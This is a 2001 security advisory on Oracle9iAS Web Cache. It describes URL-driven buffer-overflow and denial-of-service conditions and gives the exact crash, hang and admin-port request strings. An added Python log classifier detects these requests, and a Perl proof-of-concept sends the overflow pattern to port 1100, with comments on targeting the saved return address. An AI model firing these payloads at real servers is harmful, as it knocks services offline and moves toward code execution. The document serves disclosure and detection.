Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
20 Oct. 2001
Summary
Oracle9iAS Web Cache Release 2.0.0.1.0 (previous releases may also be affected) contains a URL-driven buffer overrun condition that can cause the process to exit, to hang, or to execute injected code.
Vulnerable systems:
Oracle9iAS Web Cache version 2.0.0.1.0
A simple URL-driven denial of service or buffer overflow condition occurs when a very long string is sent to the web service. This affects all four services that the Oracle9iAS Web Cache software provides, which by default listen on:
Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.
Buffer overflow condition:
When sending a request containing / + 'A' x 3095 + 'N' x 4, the process terminates with the following state dump (the four trailing bytes are what overwrites the saved return address, which is the slot the exploit below targets):
Denial of service:
Upon sending a string longer than 3570 characters, the process simply exits without a stack dump:
'GET /<3571 x A> HTTP/1.0'
The following three denial of service attacks result in the process hanging at 100% CPU usage. A reboot is required in order to terminate the hung processes:
- Sending a URL string of approximately 3094 characters.
- Sending approximately 4000 or more characters in an HTTP header. User-Agent is one of the headers verified to trigger this condition:
'GET / HTTP/1.0'
'User-Agent: <4000 x A>'
- Sending the following request (this affects only the web cache admin interface on port 4000):
'GET /. HTTP/1.0'
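For reviewing access logs or packet captures, the following is an added example (not part of the original advisory and not Oracle's code) that parses a raw HTTP request and reports which of the conditions described above it matches. The thresholds are the advisory's own numbers; the port constant for the admin interface, the finding names, and the sample requests at the bottom are assumptions constructed here for illustration.

```python
# Added example (not from the advisory or from Oracle): a classifier that
# recognises the request shapes described above, for use in a log or
# packet-capture review. Thresholds are the advisory's own numbers; the
# sample requests at the bottom are constructed here for illustration.
import re

HANG_PATH_LEN = 3094       # ~3094 bytes after '/': process hangs at 100% CPU
EXIT_PATH_LEN = 3571       # > 3570 bytes after '/': process exits, no dump
HEADER_VALUE_LEN = 4000    # ~4000-byte header value (e.g. User-Agent): hang
RET_OFFSET = 3095          # bytes after '/' before the 4 bytes that hit the return address
ADMIN_PORT = 4000          # "GET /." only affects the admin interface
OVERFLOW_RE = re.compile(r"/A{3095}N{4}")   # exact crash pattern from the advisory


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request head into (method, target, version, headers).

    Header names are lower-cased; values are kept as latin-1 text so that
    their byte length is preserved. Raises ValueError on a bad request line.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].replace(b"\r\n", b"\n")
    lines = head.split(b"\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, version = (p.decode("latin-1") for p in parts)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return method, target, version, headers


def return_address_slot(path: str) -> str:
    """Return the four bytes that would overwrite the saved return address
    (offset 3095..3098 after the leading '/'), or '' if the path is shorter."""
    body = path[1:] if path.startswith("/") else path
    return body[RET_OFFSET:RET_OFFSET + 4] if len(body) >= RET_OFFSET + 4 else ""


def classify(raw: bytes, dst_port: int) -> list:
    """List the advisory conditions a single request matches (empty list if none)."""
    _method, target, _version, headers = parse_request(raw)
    path = target.split("?", 1)[0]
    plen = len(path) - 1 if path.startswith("/") else len(path)
    findings = []
    if OVERFLOW_RE.fullmatch(path):
        findings.append("overflow-pattern")
    elif plen >= EXIT_PATH_LEN:
        findings.append("long-path-exit")
    elif plen >= HANG_PATH_LEN:
        findings.append("long-path-hang")
    for name, value in headers.items():
        if len(value) >= HEADER_VALUE_LEN:
            findings.append("long-header:" + name)
    if dst_port == ADMIN_PORT and path == "/.":
        findings.append("admin-dot-path")
    return findings


# Constructed samples, one per condition in the advisory, plus a benign request.
SAMPLES = [
    (1100, b"GET /" + b"A" * 3095 + b"NNNN" + b" HTTP/1.0\r\n\r\n"),
    (1100, b"GET /" + b"A" * 3571 + b" HTTP/1.0\r\n\r\n"),
    (1100, b"GET /" + b"A" * 3094 + b" HTTP/1.0\r\n\r\n"),
    (1100, b"GET / HTTP/1.0\r\nUser-Agent: " + b"A" * 4000 + b"\r\n\r\n"),
    (4000, b"GET /. HTTP/1.0\r\n\r\n"),
    (1100, b"GET /index.html HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\n\r\n"),
]

if __name__ == "__main__":
    for port, raw in SAMPLES:
        print(port, classify(raw, port) or ["ok"])
```

The path length is measured after the leading slash so that the advisory's counts ('A' x 3095, 3571 x A) map directly onto the thresholds; the return_address_slot helper pulls out the four bytes an attacker placed at the overwrite offset, which is the first thing to look at when deciding whether a crash was a probe or an exploitation attempt.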
Exploit:
####################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
####################################################################
use strict;
use warnings;
use Socket;

my $ARGC = @ARGV;
if ($ARGC != 1) {
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}

my ($remote, $port, $iaddr, $paddr, $proto);
$remote = $ARGV[0];
$port   = "1100";    # default port for the web cache proxy
$iaddr  = inet_aton($remote) or die "Error: $!";
$paddr  = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto  = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

# The remainder of the original script (the return address and the
# shellcode that writes c:\defcom.iyd) is not reproduced on this page.
# The request below sends the crash pattern described in the advisory:
# 3095 x 'A' followed by the four bytes that land on the saved return
# address ('N' x 4), which is enough to reproduce the process termination.
my $request = "GET /" . ("A" x 3095) . ("N" x 4) . " HTTP/1.0\r\n\r\n";
send(SOCK, $request, 0) or die "Error: $!";
close(SOCK);